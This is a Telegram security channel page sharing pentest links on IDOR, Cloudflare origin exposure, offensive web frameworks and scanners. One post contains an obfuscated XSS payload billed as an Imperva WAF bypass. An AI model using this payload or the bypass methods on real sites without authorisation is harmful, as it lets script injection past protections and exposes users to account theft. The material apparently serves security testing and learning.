Information Security – Telegram

Information Security

408 subscribers

157 photos

5 videos

9 files

2.28K links

Information Security News

we are @sec_nerd twin brother

Download Telegram

About

Blog

Apps

Platform

Information Security

408 subscribers

Information Security

IDOR: Insecure Direct Object Reference

https://www.gracefulsecurity.com/idor-insecure-direct-object-reference/

#idor
#pentest
#web

@sec_nerd_en

52 views18:53

Information Security

cloudflare bypass material

https://blog.christophetd.fr/bypassing-cloudflare-using-internet-wide-scan-data/

http://www.chokepoint.net/2017/10/exposing-server-ips-behind-cloudflare.html

http://www.securityidiots.com/Web-Pentest/Information-Gathering/Cloudflare-Bypass/Part-2-Cloudflare-Security-Bypass.html

https://medium.com/secure-hacker/bypass-cloudflare-protection-get-subdomains-ofa-website-2cb1d749c510

#web
#pentest
#bypass
#sqli
#xss

@sec_nerd_en

Christophe Tafani-Dereeper

CloudFlair: Bypassing Cloudflare using Internet-wide scan data - Christophe Tafani-Dereeper

Cloudflare is a service that acts as a middleman between a website and its end users, protecting it from various attacks. Unfortunately, those websites are often poorly configured, allowing an attacker to entirely bypass Cloudflare and run DDoS attacks or…

69 views19:18

Information Security

Forwarded from امنیت اطلاعات

This media is not supported in your browser

VIEW IN TELEGRAM

hackbar #burpsuite

https://github.com/d3vilbug/HackBar/releases/tag/1.0

#web
#pentest

@sec_nerd

11 views06:48

Information Security

TIDoS Framework

The Offensive Web Application Penetration Testing Framework.

https://github.com/theInfectedDrake/TIDoS-Framework

#web
#pentest

321 views20:09

Information Security

Forwarded from امنیت اطلاعات

Imperva WAF Bypass for XSS;

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

- without parentheses, 'alert', 'document.domain' , 'window' , space

#waf
#web
#pentest

@sec_nerd

7 views02:35

Information Security

https://twitter.com/hackerscrolls/status/1247177578269597698

Three effective ways how you can use Match & Replace in Burp Proxy. Trick by @igc_iv #BugBountyTip #BurpSuite #Web

128 views19:01

Information Security

Web Scanners:
https://github.com/andresriancho/w3af
https://github.com/sullo/nikto
https://github.com/wpscanteam/wpscan
https://github.com/rezasp/joomscan
https://github.com/Arachni/arachni
https://github.com/droope/droopescan
https://github.com/Dionach/CMSmap
https://github.com/jekyc/wig
https://github.com/zaproxy/
https://github.com/skavngr/rapidscan
#web #bugbountytip

GitHub - andresriancho/w3af: w3af: web application attack and audit framework, the open source web vulnerability scanner.

w3af: web application attack and audit framework, the open source web vulnerability scanner. - andresriancho/w3af

171 views10:36